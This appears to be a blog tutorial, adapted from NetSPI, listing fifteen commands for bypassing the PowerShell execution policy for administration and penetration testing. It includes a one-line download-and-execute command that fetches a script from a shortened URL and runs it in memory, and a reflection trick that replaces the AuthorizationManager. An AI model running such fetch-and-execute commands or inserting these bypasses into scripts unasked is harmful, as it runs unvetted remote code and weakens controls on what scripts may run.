15 Ways to Bypass the PowerShell Execution Policy
π What is the PowerShell Execution Policy?
The execution policy determines what type of PowerShell scripts (if any) can run. By default, it's set to Restricted, which blocks all scripts. It's meant to prevent accidental execution, not as a true security control β which is why itβs easy to bypass.
π‘ Why Bypass It?
- PowerShell is native to Windows
- Maintenance of a Server Requiring .PS1 scripts created by another organization.
- Can interact with the Windows API
- Can run in memory (no disk writes)
- Often trusted by whitelisting tools
- Used in many open-source pentest frameworks
π View Current Execution Policy
Get-ExecutionPolicy
Get-ExecutionPolicy -List | Format-Table -AutoSizeπ§ͺ Test Script Example
Write-Host "My voice is my passport, verify me."---
πͺ 15 Ways to Bypass Execution Policy
- Paste in Interactive Console
Directly run the script in PowerShell. No config changes or file writes. - Echo to PowerShell
echo Write-Host "My voice is my passport" | powershell -noprofile - - Pipe File via Type/Get-Content
Get-Content .\runme.ps1 | powershell -noprofile -type .\runme.ps1 | powershell -noprofile - - Download + Invoke-Expression
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')" - Use -Command Switch
powershell -command "Write-Host 'Hello'" - Use -EncodedCommand
Then run with:$cmd = "Write-Host 'Hello'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd) [Convert]::ToBase64String($bytes)powershell -EncodedCommand <base64> - Invoke-Command
Can also pull policy from a remote host:Invoke-Command -ScriptBlock {Write-Host "Hello"}
Invoke-Command -ComputerName server -ScriptBlock {Get-ExecutionPolicy} | Set-ExecutionPolicy -Force - Invoke-Expression (iex)
orGet-Content .\runme.ps1 | Invoke-Expression
gc .\runme.ps1 | iex - Use -ExecutionPolicy Bypass
powershell -ExecutionPolicy Bypass -File .\runme.ps1 - Use -ExecutionPolicy Unrestricted
powershell -ExecutionPolicy UnRestricted -File .\runme.ps1 - Use -ExecutionPolicy RemoteSigned
powershell -ExecutionPolicy RemoteSigned -File .\runme.ps1 - Swap AuthorizationManager (Temporary)
function Disable-ExecutionPolicy { ($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue( $ctx, (New-Object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell")) } Disable-ExecutionPolicy - Set Policy for Process
Only for this session.Set-ExecutionPolicy Bypass -Scope Process - Set Policy for Current User
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy UnRestricted - Edit Registry for Current User
Modify:
HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
Add/modify string value
ExecutionPolicy = Unrestricted
---
β Wrap Up
PowerShellβs execution policy is a soft restriction β not a security boundary. Microsoft even provides native ways to bypass it. Use these techniques for legitimate automation, testing, and administration.
Adapted from NetSPI β original blog post
No Comments